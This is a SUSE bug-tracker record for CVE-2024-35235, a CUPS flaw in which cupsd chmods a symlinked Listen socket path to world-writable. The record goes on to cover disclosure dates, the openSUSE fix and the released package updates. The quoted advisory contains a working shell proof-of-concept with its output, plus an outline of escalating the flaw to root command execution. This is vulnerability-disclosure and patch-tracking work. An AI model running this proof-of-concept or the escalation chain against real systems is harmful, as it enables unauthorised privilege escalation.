Bug 1225365 (CVE-2024-35235)

Summary: VUL-0: CVE-2024-35235: cups: Listen port arbitrary chmod 0140777
Product: [Novell Products] SUSE Security Incidents Reporter: SMASH SMASH <smash_bz>
Component: IncidentsAssignee: Johannes Meixner <jsmeix>
Status: IN_PROGRESS --- QA Contact: Security Team bot <security-team>
Severity: Major    
Priority: P3 - Medium CC: gianluca.gabrielli, meissner, security-team
Version: unspecifiedFlags: jsmeix: needinfo? (security-team)
Target Milestone: ---   
Hardware: Other   
OS: Other   
URL: https://smash.suse.de/issue/407859/
Whiteboard: CVSSv3.1:SUSE:CVE-2024-35235:7.8:(AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Found By: Security Response Team Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---

Description SMASH SMASH 2024-05-27 14:33:09 UTC 
CRD: 2024-06-06

https://github.com/OpenPrinting/cups/security/advisories/GHSA-vvwp-mv6j-hw6f

================================================================
Cupsd Listen arbitrary chmod 0140777


Summary

When starting the cupsd server with a Listen configuration
item pointing to a symbolic link, the cupsd process can be
caused to perform an arbitrary chmod of the provided
argument, providing world-writable access to the target.


Details

This is an excerpt from a larger chain of vulnerabilities
reported in Ubuntu 24.04. There is an assumption for
exploitation that /etc/cups/cupsd.conf can be successfully
edited (this has been omitted here as it is believed
to be out of scope).

When setting up the bind for unix sockets configured
in the Listen parameters of the configuration file,
the code does not check for a successful call
to unlink and bind prior to performing the
call to chmod. [1]

On Ubuntu 24.04, by setting the Listen argument
to a path such as /tmp/stage/file, where file
is a symlink elsewhere in the system, the previous
call to unlink for the path will fail due
to AppArmor [2], and the subsequent call to bind
will also fail due to the file still existing.
The return value of the call to bind is not checked
before the call to chmod, so a successfully planted
symbolic link which causes the bind to fail will
still be traversed by the call to chmod and the
file permissions changed to be world writable.

On systems where the Ubuntu AppArmor policy is
not in place, this vulnerability still exists
but as a race condition between the call
to unlink and the call to bind. A sufficiently
fast attacker could place a symbolic link at
the configured location after the call to unlink,
causing the bind to fail once again and performing
a successful chmod.


[1]
cups/cups/http-addr.c
Lines 229 to 240 in aba9170
-----------------------------------------------------
  unlink(addr->un.sun_path);

  // Save the current umask and set it to 0 so that all users can access
  // the domain socket...
  mask = umask(0);

  // Bind the domain socket...
  status = bind(fd, (struct sockaddr *)addr, 
(socklen_t)httpAddrLength(addr));

  // Restore the umask and fix permissions...
  umask(mask);
  chmod(addr->un.sun_path, 0140777);
-----------------------------------------------------


[2] 
https://git.launchpad.net/ubuntu/+source/apparmor/tree/profiles/apparmor.d/abstractions/user-tmp#n21


PoC

The following script can be used for exploitation,
sudo is used to emulate the above mentioned
Listen configuration access.
-----------------------------------------------------
set -e
exploit() {
         echo "Staging..."
         mkdir -m 777 /tmp/stage
         ln -s /etc/cups/cupsd.conf /tmp/stage/cupsd.conf

         # emulate configuration access to cupsd.conf
         echo 'Listen /tmp/stage/cupsd.conf' | sudo tee -a 
/etc/cups/cupsd.conf

         echo

         echo "Current permissions of cupsd.conf"
         ls -l /etc/cups/cupsd.conf
         tail -n1 /etc/cups/cupsd.conf || true

         echo

         echo "Restarting cupsd"
         sudo systemctl restart cups

         echo

         echo "New permissions of cupsd.conf"
         ls -l /etc/cups/cupsd.conf
         tail -n1 /etc/cups/cupsd.conf || true
}

cleanup() {
         sudo sed -i '/Listen \/tmp\/stage\/cupsd.conf/d' 
/etc/cups/cupsd.conf
         sudo chmod 640 /etc/cups/cupsd.conf
         rm -rf /tmp/stage
}

$@
-----------------------------------------------------

Sample output can be seen below:
-----------------------------------------------------
$ sh poc.sh exploit
Staging...
Listen /tmp/stage/cupsd.conf

Current permissions of cupsd.conf
-rw-r----- 1 root lp 4987 May 24 10:18 /etc/cups/cupsd.conf
tail: cannot open '/etc/cups/cupsd.conf' for reading: Permission denied

Restarting cupsd

New permissions of cupsd.conf
-rwxrwxrwx 1 root lp 4987 May 24 10:18 /etc/cups/cupsd.conf
Listen /tmp/stage/cupsd.conf
$ sh poc.sh cleanup
-----------------------------------------------------


Impact

Given that cupsd is often running as root, this can
result in the change of permission of any user or
system files to be world writable.

Given the aforementioned Ubuntu AppArmor context,
on such systems this vulnerability is limited to those
files modifiable by the cupsd process. In that specific
case it was found to be possible to turn the
configuration of the Listen argument into full
control over the cupsd.conf and cups-files.conf
configuration files. By later setting the User
and Group arguments in cups-files.conf, and
printing with a printer configured by PPD with
a FoomaticRIPCommandLine argument, arbitrary
user and group (not root) command execution
could be achieved, which can further be used
on Ubuntu systems to achieve full root command
execution.

================================================================

GitHub has issued CVE-2024-35235 for this Security Advisory
after reviewing it for compliance with CVE rules.
Once you've published your Security Advisory, we'll publish
the CVE to the CVE List https://cve.mitre.org/cve/

================================================================


The currently proposed dates and time are:

Today or tomorrow send announcement to distros list.

Public disclosure next week June 06
Comment 3 Marcus Meissner 2024-05-28 11:44:28 UTC 
CRD: 2024-06-11 14:00UTC
Comment 13 Marcus Meissner 2024-06-11 14:16:46 UTC 
is public now

there is vulnerability CVE-2024-35235 in cups project:


    Description


      Summary

When starting the cupsd server with a Listen configuration item pointing 
to a symbolic link, the cupsd process can be caused to perform an 
arbitrary chmod of the provided argument, providing world-writable 
access to the target.


      Details

This is an excerpt from a larger chain of vulnerabilities reported in 
Ubuntu 24.04. There is an assumption for exploitation that 
/etc/cups/cupsd.conf can be successfully edited (this has been omitted 
here as it is believed to be out of scope).

When setting up the bind for unix sockets configured in the Listen 
parameters of the configuration file, the code does not check for a 
successful call to |unlink| and |bind| prior to performing the call to 
|chmod|. [1]

On Ubuntu 24.04, by setting the Listen argument to a path such as 
|/tmp/stage/file|, where |file| is a symlink elsewhere in the system, 
the previous call to |unlink| for the path will fail due to AppArmor 
[2], and the subsequent call to |bind| will also fail due to the file 
still existing. The return value of the call to |bind| is not checked 
before the call to |chmod|, so a successfully planted symbolic link 
which causes the |bind| to fail will still be traversed by the call to 
|chmod| and the file permissions changed to be world writable.

On systems where the Ubuntu AppArmor policy is not in place, this 
vulnerability still exists but as a race condition between the call to 
|unlink| and the call to |bind|. A sufficiently fast attacker could 
place a symbolic link at the configured location after the call to 
|unlink|, causing the |bind| to fail once again and performing a 
successful |chmod|.

      Severity: Moderate - CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
....
Comment 15 Johannes Meixner 2024-06-11 14:30:45 UTC 
Fixed for openSUSE Factory / Tumbleweed:
-------------------------------------------------------
# osc submitrequest \
 -m 'Fix for CVE-2024-35235 bsc#1225365' \
 home:jsmeix:branches:Printing cups Printing cups
created request id 1180031

# osc request accept \
 -m 'Fix for CVE-2024-35235 bsc#1225365' 1180031
Result of change request state: ok
...
openSUSE:Factory 
Forward this submit to it? ([y]/n)y
The following submit request is already open: 1179938.
Supersede the old request? (y/n/c) y
Fix for CVE-2024-35235 bsc#1225365
 (forwarded request 1180031 from jsmeix)
New request # 1180032
-------------------------------------------------------
Comment 16 OBSbugzilla Bot 2024-06-11 15:05:03 UTC 
This is an autogenerated message for OBS integration:
This bug (1225365) was mentioned in
https://build.opensuse.org/request/show/1180032 Factory / cups
Comment 17 Maintenance Automation 2024-06-12 08:30:04 UTC 
SUSE-SU-2024:2003-1: An update that solves one vulnerability and has one security fix can now be installed.

Category: security (important)
Bug References: 1223179, 1225365
CVE References: CVE-2024-35235
Maintenance Incident: [SUSE:Maintenance:34073](https://smelt.suse.de/incident/34073/)
Sources used:
openSUSE Leap Micro 5.3 (src):
 cups-2.2.7-150000.3.59.1
openSUSE Leap Micro 5.4 (src):
 cups-2.2.7-150000.3.59.1
openSUSE Leap 15.5 (src):
 cups-2.2.7-150000.3.59.1
openSUSE Leap 15.6 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Micro for Rancher 5.3 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Micro 5.3 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Micro for Rancher 5.4 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Micro 5.4 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Micro 5.5 (src):
 cups-2.2.7-150000.3.59.1
Basesystem Module 15-SP5 (src):
 cups-2.2.7-150000.3.59.1
Basesystem Module 15-SP6 (src):
 cups-2.2.7-150000.3.59.1
Desktop Applications Module 15-SP5 (src):
 cups-2.2.7-150000.3.59.1
Desktop Applications Module 15-SP6 (src):
 cups-2.2.7-150000.3.59.1
Development Tools Module 15-SP5 (src):
 cups-2.2.7-150000.3.59.1
Development Tools Module 15-SP6 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise High Performance Computing 15 SP2 LTSS 15-SP2 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise High Performance Computing LTSS 15 SP3 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise High Performance Computing ESPOS 15 SP4 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise High Performance Computing LTSS 15 SP4 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Desktop 15 SP4 LTSS 15-SP4 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Server 15 SP2 LTSS 15-SP2 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Server 15 SP3 LTSS 15-SP3 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Server 15 SP4 LTSS 15-SP4 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Server for SAP Applications 15 SP2 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Server for SAP Applications 15 SP3 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Server for SAP Applications 15 SP4 (src):
 cups-2.2.7-150000.3.59.1
SUSE Manager Proxy 4.3 (src):
 cups-2.2.7-150000.3.59.1
SUSE Manager Retail Branch Server 4.3 (src):
 cups-2.2.7-150000.3.59.1
SUSE Manager Server 4.3 (src):
 cups-2.2.7-150000.3.59.1
SUSE Enterprise Storage 7.1 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Micro 5.2 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Micro for Rancher 5.2 (src):
 cups-2.2.7-150000.3.59.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 18 Maintenance Automation 2024-06-12 08:30:08 UTC 
SUSE-SU-2024:2002-1: An update that solves one vulnerability can now be installed.

Category: security (important)
Bug References: 1225365
CVE References: CVE-2024-35235
Maintenance Incident: [SUSE:Maintenance:34177](https://smelt.suse.de/incident/34177/)
Sources used:
SUSE Linux Enterprise Software Development Kit 12 SP5 (src):
 cups-1.7.5-20.49.1
SUSE Linux Enterprise High Performance Computing 12 SP5 (src):
 cups-1.7.5-20.49.1
SUSE Linux Enterprise Server 12 SP5 (src):
 cups-1.7.5-20.49.1
SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src):
 cups-1.7.5-20.49.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 23 Maintenance Automation 2024-07-12 16:30:51 UTC 
SUSE-SU-2024:2003-2: An update that solves one vulnerability and has one security fix can now be installed.

Category: security (important)
Bug References: 1223179, 1225365
CVE References: CVE-2024-35235
Maintenance Incident: [SUSE:Maintenance:34073](https://smelt.suse.de/incident/34073/)
Sources used:
SUSE Linux Enterprise Micro 5.5 (src):
 cups-2.2.7-150000.3.59.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.